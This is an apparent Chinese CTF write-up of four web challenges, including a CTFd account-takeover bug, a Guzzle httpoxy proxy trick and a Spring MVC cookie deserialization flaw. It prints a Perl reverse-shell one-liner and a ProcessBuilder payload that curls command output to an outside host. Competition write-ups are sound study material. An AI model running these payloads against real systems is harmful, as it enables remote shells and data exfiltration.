有很多地方没有转过来,思维过于僵硬,感谢赵师傅出的精美题目

HappyCTFd

CTFd 的漏洞

简单来说来说就是注册带空格恶意用户名然后忘记密码进行修改

https://www.colabug.com/2020/0204/6940556/

Checkin

找了亿个反弹 shell,下面是有用的一个

https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.216.98:9000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

系统没有 losf、ps 等进程命令,所以自己逐个去 /proc 找

1
2
3
4
5
6
7
8
9
10
11
12
13
app@362cb9dcadd1:/proc$ cd 10
app@362cb9dcadd1:/proc/10$ cd fd
app@362cb9dcadd1:/proc/10/fd$ ls -al
total 0
dr-x------ 2 app app  0 Feb 29 05:47 .
dr-xr-xr-x 9 app app  0 Feb 29 05:43 ..
lrwx------ 1 app app 64 Feb 29 05:47 0 -> /dev/null
l-wx------ 1 app app 64 Feb 29 05:47 1 -> 'pipe:[421276576]'
l-wx------ 1 app app 64 Feb 29 05:47 2 -> 'pipe:[421276577]'
lr-x------ 1 app app 64 Feb 29 05:47 3 -> '/home/app/flag.txt (deleted)'
lrwx------ 1 app app 64 Feb 29 05:47 4 -> 'socket:[421292108]'
app@362cb9dcadd1:/proc/10/fd$ cat 3
flag{85693908-b5aa-4f03-96a8-133fc30854d3}

TimeTravel

phpinfo 没有读到有用的信息

读 composer.json 文件根据组件查找 CVE

1
2
3
4
{
	"require":{
		"guzzlehttp/guzzle":"6.2.0"
	}

https://www.laruence.com/2016/07/19/3101.html

开一台内网主机

1
2
3
4
5
6
# index.php
<?php
        $arr = array("success"=>true);
        header("Content-Type:application/json");
        echo json_encode($arr);
# 执行 php -S 0:9999
1
Proxy: http://174.0.216.98:9999

EasySpringMVC

javaweb 的题目

这里用 Tools 类生成 cookies,而 Tools 类继承序列化类,所以 cookies 有反序列化操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// springmvcdemo.war!\WEB-INF\classes\com\filters\ClentInfoFilter.class
String b64 = cookie.getValue();
      Base64.Decoder decoder = Base64.getDecoder();
      byte[] bytes = decoder.decode(b64);
      ClientInfo cinfo = null;
      if ((b64.equals("")) || (bytes == null))
      {
        cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
        Base64.Encoder encoder = Base64.getEncoder();
        try
        {
          bytes = Tools.create(cinfo);
        }
        catch (Exception e)
        {
          e.printStackTrace();
        }
        cookie.setValue(encoder.encodeToString(bytes));

PictureController.class 存在文件上传和文件包含,需要伪造成 admin,webmanager,我们直接在任意一个 jsp 页面运行以下代码覆盖原 cookies 就可以拿去文件上传了。

1
2
3
4
5
6
7
8
<%
    ClientInfo cinfo = new ClientInfo("admin", "webmanager", ((HttpServletRequest)request).getRequestedSessionId());
    byte[] bytes = Tools.create(cinfo);
    cookie = new Cookie("cinfo", encoder.encodeToString(bytes));
    cookie.setMaxAge(86400);
    ((HttpServletResponse)response).addCookie(cookie);
    ((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
%>

但是文件上传只能通过修改文件名存储到 /tmp 目录,jsp 文件包含除了 jpg 和 gif 只能取到文件名,所以此处文件包含是不可取了。赛后看了其他大哥的博客,原来是 ProcessBuilder漏洞。

1
2
3
4
5
6
7
// springmvcdemo.war!\WEB-INF\classes\com\tools\Tools.class
private void readObject(ObjectInputStream in)
  throws IOException, ClassNotFoundException
{
  Object obj = in.readObject();
  new ProcessBuilder((String[])obj).start();
}

这里我们可以通过重写writeObject方法来实现,来构造一个字符串传给ProcessBuilder执行命令

1
2
3
4
private void writeObject(ObjectOutputStream out) throws IOException {
        String[] cmd = {"/bin/sh","-c","curl http://174.0.218.99:9000/`/readflag`"};
        out.writeObject(cmd);
}

在 Tools 类里加上上面的函数,然后生成序列化的 cookies,带上去另一边监听即可得到 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import java.io.*;
import java.util.Base64;
import com.tools.*;
public class exp {
    public static void main(String[] args) {
        Base64.Encoder encoder = Base64.getEncoder();
		try {
            Tools cinfo = new Tools();
            byte[] bytes = Tools.create(cinfo);
            String payload = encoder.encodeToString(bytes);
            System.out.println(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}